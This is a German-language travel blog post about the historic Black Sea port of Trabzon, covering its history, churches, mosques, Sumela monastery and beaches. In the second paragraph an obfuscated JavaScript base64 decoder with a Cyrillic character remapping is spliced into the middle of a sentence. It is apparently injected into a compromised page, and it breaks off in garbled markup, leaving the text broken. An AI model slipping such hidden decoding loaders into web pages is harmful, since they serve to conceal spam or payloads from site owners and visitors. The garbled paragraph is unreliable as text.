Reisetipp: Die historische Hafenstadt Trabzon

Die historische Hafenstadt Trabzon, im Nordosten der Türkei gelegen, ist Hauptstadt der gleichnamigen Provinz. Durch ihre exponierte Lage am Schwarzen Meer hat Trabzon schon vor über 9000 Jahren Bedeutung erlangt und blickt somit auf eine bewegte Geschichte zurück, die sich heute noch in vielen sehenswerten architektonischen Besonderheiten ausdrückt. Die Lage und Bedeutung von Trabzon kommt zum Beispiel zum Ausdruck, wenn man die alten Griechen betrachtet, die die Stadt als Grenze zwischen Europa und Asien und zwischen Zivilisation und Barbarei, sahen.

Im Gegensatz zu vielen anderen Regionen der function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Türkei">Türkei, wirkt die Schwarzmeer Küste eher tropisch und Trabzon liegt idyllisch eingebettet in riesige Haselnuss-, Tabak-, Mais- und Teeplantagen. Die Gegend, mit ihren hohen Bergen, mit Almwiesen und riesigen Wäldern, erinnert eher an das Alpenland.

Sonnenuntergang in der TürkeiSonnenuntergang in der Türkei (Foto: © Rainer Sturm/pixelio.de)

Für geschichtlich Interessierte ist Trabzon und seine Umgebung ein Eldorado und die Ruinen vieler Burgen und Kirchen zeugen von der bewegten Vergangenheit dieser historischen Gegend. Die Universitätsstadt Trabzon ist besonders während der Semesterzeit eine agile, pulsierende Stadt, die mit ihren Märkten und Basaren ein ganz besonderes orientalisches Flair ausstrahlt. Wer der Stadt einen Besuch abstattet, sollte es auf keinen Fall versäumen, die Hagia Sophia Kirche aus dem 13. Jahrhundert zu besuchen, die als das bedeutendste Baudenkmal angesehen wird und insbesondere wegen ihrer Fresken weltbekannt ist. Auch die über einhundert Moscheen in Trabzon sind sehenswert und sollten bei der Urlaubsplanung berücksichtigt werden. Wer durch die malerischen Gassen der Altstadt promeniert, fühlt sich in eine andere Welt versetzt und wird verzaubert sein vom regen Treiben und den vielen Eindrücken, die hier wirken. Viele Kirchen, die noch aus der byzantinischen Zeit stammen, werden heute als Moschee genutzt und der Irenen Turm aus dem 14. Jahrhundert ist ebenso beeindruckend, wie das historische Mädchenkloster. Auch das Kloster Sumela, das auf einem Berg südlich von Trabzon gelegen ist, sollte man schon alleine wegen seines atemberaubenden Ausblicks, der sich dem Besucher hier bietet, besuchen.

Im angenehmen Klima finden vor allem Individualreisende in Trabzon ideale Urlaubsbedingungen vor. Die wunderschönen Strände des Schwarzen Meeres laden zu Wassersportarten aller Art ein und wer will, kann sich hier einmal richtig vom Alltagsstress erholen. Zwar sucht man Surfcamps wie an der Atlantikküste vergebens, aber Jetski, Mountainbiking oder Wander sind nur einige Möglichkeiten der Freizeitgestaltung.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg